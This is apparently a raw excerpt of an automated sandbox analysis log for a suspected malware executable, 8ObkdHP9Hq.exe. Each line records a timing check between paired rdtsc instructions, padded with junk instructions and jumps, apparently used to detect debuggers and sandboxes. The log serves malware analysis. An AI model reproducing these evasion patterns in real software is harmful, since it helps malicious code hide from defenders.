Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A66E46 second address: A66E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A66FD2 second address: A66FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A676DD second address: A676E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A6A875 second address: A6A889 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A6A889 second address: A6A88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A6A88E second address: A6A919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1965h], edx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FD0B5348058h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push A7BC0B05h 0x0000002f pushad 0x00000030 jc 00007FD0B5348058h 0x00000036 pushad 0x00000037 popad 0x00000038 jmp 00007FD0B5348063h 0x0000003d popad 0x0000003e add dword ptr [esp], 5843F57Bh 0x00000045 jns 00007FD0B5348060h 0x0000004b push 00000003h 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+122D19A7h], edx 0x00000055 push 00000003h 0x00000057 mov edi, 168D17CEh 0x0000005c movsx edi, bx 0x0000005f push EF545AD5h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push esi 0x00000068 pop esi 0x00000069 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A6A9D4 second address: A6AAB5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0B548336Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b adc cx, EFA5h 0x00000010 push 00000000h 0x00000012 or dh, 00000000h 0x00000015 call 00007FD0B5483369h 0x0000001a jnl 00007FD0B5483370h 0x00000020 push eax 0x00000021 jmp 00007FD0B5483374h 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a jmp 00007FD0B548336Dh 0x0000002f mov eax, dword ptr [eax] 0x00000031 jmp 00007FD0B5483379h 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a jne 00007FD0B5483378h 0x00000040 jmp 00007FD0B5483372h 0x00000045 pop eax 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007FD0B5483368h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 0000001Bh 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 clc 0x00000061 push 00000003h 0x00000063 sbb cx, 7726h 0x00000068 push 00000000h 0x0000006a mov dl, al 0x0000006c push 00000003h 0x0000006e push F09AF794h 0x00000073 pushad 0x00000074 je 00007FD0B5483374h 0x0000007a jmp 00007FD0B548336Eh 0x0000007f push eax 0x00000080 push edx 0x00000081 pushad 0x00000082 popad 0x00000083 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A6AAB5 second address: A6AB05 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 309AF794h 0x00000012 mov dx, di 0x00000015 lea ebx, dword ptr [ebp+1244F76Ch] 0x0000001b jmp 00007FD0B5348064h 0x00000020 mov dword ptr [ebp+122D191Eh], ebx 0x00000026 xchg eax, ebx 0x00000027 jng 00007FD0B5348060h 0x0000002d push eax 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 js 00007FD0B5348056h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A6AB5C second address: A6ABF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp], eax 0x0000000b and edi, 42685FDDh 0x00000011 mov edx, 10700C00h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FD0B5483368h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 adc esi, 13B2FA4Bh 0x00000038 call 00007FD0B5483369h 0x0000003d push edi 0x0000003e jmp 00007FD0B5483375h 0x00000043 pop edi 0x00000044 push eax 0x00000045 jnc 00007FD0B548338Bh 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f ja 00007FD0B548336Ah 0x00000055 mov eax, dword ptr [eax] 0x00000057 pushad 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A6ABF9 second address: A6AC20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD0B5348067h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A6AC20 second address: A6ACC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483378h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edi, dword ptr [ebp+122D2E48h] 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FD0B5483368h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FD0B5483368h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov ecx, dword ptr [ebp+122D2F49h] 0x0000004e mov dword ptr [ebp+122D1965h], ebx 0x00000054 push 00000003h 0x00000056 call 00007FD0B548336Ah 0x0000005b add di, 137Bh 0x00000060 pop ecx 0x00000061 mov edx, eax 0x00000063 push E4D0E2D3h 0x00000068 pushad 0x00000069 push ecx 0x0000006a push edx 0x0000006b pop edx 0x0000006c pop ecx 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007FD0B5483372h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A6ACC2 second address: A6AD19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348065h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 24D0E2D3h 0x00000011 and edi, dword ptr [ebp+122D1A90h] 0x00000017 lea ebx, dword ptr [ebp+1244F777h] 0x0000001d push edi 0x0000001e jmp 00007FD0B5348062h 0x00000023 pop edx 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007FD0B534805Fh 0x0000002d push eax 0x0000002e pop eax 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A54F78 second address: A54F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A54F7E second address: A54F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A54F82 second address: A54F94 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0B5483366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FD0B548336Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A89EEB second address: A89EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jng 00007FD0B5348056h 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8A065 second address: A8A06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8A06A second address: A8A06F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8A06F second address: A8A07B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A54F63 second address: A54F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A54F69 second address: A54F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B548336Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8A35F second address: A8A395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jl 00007FD0B5348058h 0x00000011 pushad 0x00000012 jmp 00007FD0B5348066h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8A546 second address: A8A54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8A54C second address: A8A550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8A694 second address: A8A6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FD0B5483366h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8A6A2 second address: A8A6C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FD0B5348056h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8A946 second address: A8A958 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0B5483366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FD0B5483366h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8A958 second address: A8A96D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8AAB3 second address: A8AAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8AAB9 second address: A8AAC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8AAC0 second address: A8AAC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8AAC5 second address: A8AACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8AACB second address: A8AAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8AAD7 second address: A8AADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8AADD second address: A8AAFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483371h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FD0B5483366h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8AAFC second address: A8AB00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8AB00 second address: A8AB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD0B5483377h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8AB1F second address: A8AB2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8B4A6 second address: A8B4F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Eh 0x00000007 jnl 00007FD0B548336Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FD0B5483378h 0x00000015 jmp 00007FD0B548336Dh 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FD0B5483366h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8B4F6 second address: A8B4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8B4FA second address: A8B4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8B617 second address: A8B61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8B61D second address: A8B625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8B625 second address: A8B62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8B62A second address: A8B636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 js 00007FD0B5483366h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A8DABF second address: A8DAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A91D08 second address: A91D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FD0B5483375h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A92388 second address: A92392 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A92392 second address: A923CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0B5483370h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jno 00007FD0B5483370h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FD0B548336Ah 0x00000020 push esi 0x00000021 pop esi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A96C0C second address: A96C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A96C1C second address: A96C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A96C20 second address: A96C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348063h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FD0B5348061h 0x0000000f jbe 00007FD0B5348056h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9701E second address: A97024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A97024 second address: A97028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A97028 second address: A97040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Dh 0x00000007 push ebx 0x00000008 jg 00007FD0B5483366h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A972EE second address: A972F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9A231 second address: A9A237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9A237 second address: A9A285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jno 00007FD0B534805Eh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 ja 00007FD0B5348058h 0x00000018 jmp 00007FD0B534805Bh 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007FD0B5348060h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push ecx 0x0000002c jno 00007FD0B5348056h 0x00000032 pop ecx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9A9BB second address: A9A9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9A9BF second address: A9A9C9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9A9C9 second address: A9A9D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD0B5483366h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9B09B second address: A9B0B0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD0B534805Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9B17A second address: A9B180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9B293 second address: A9B2A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9B2A5 second address: A9B2AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9B2AB second address: A9B2AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9B375 second address: A9B37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9B4C1 second address: A9B4E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD0B5348067h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9D410 second address: A9D414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9D414 second address: A9D418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9E651 second address: A9E655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9E655 second address: A9E662 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA03A7 second address: AA03CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483379h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA03CA second address: AA03F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FD0B5348056h 0x0000000f jmp 00007FD0B534805Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A4E3B6 second address: A4E3BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A4E3BA second address: A4E3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A4E3C0 second address: A4E3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD0B5483373h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A4E3DD second address: A4E3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A4E3E3 second address: A4E3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
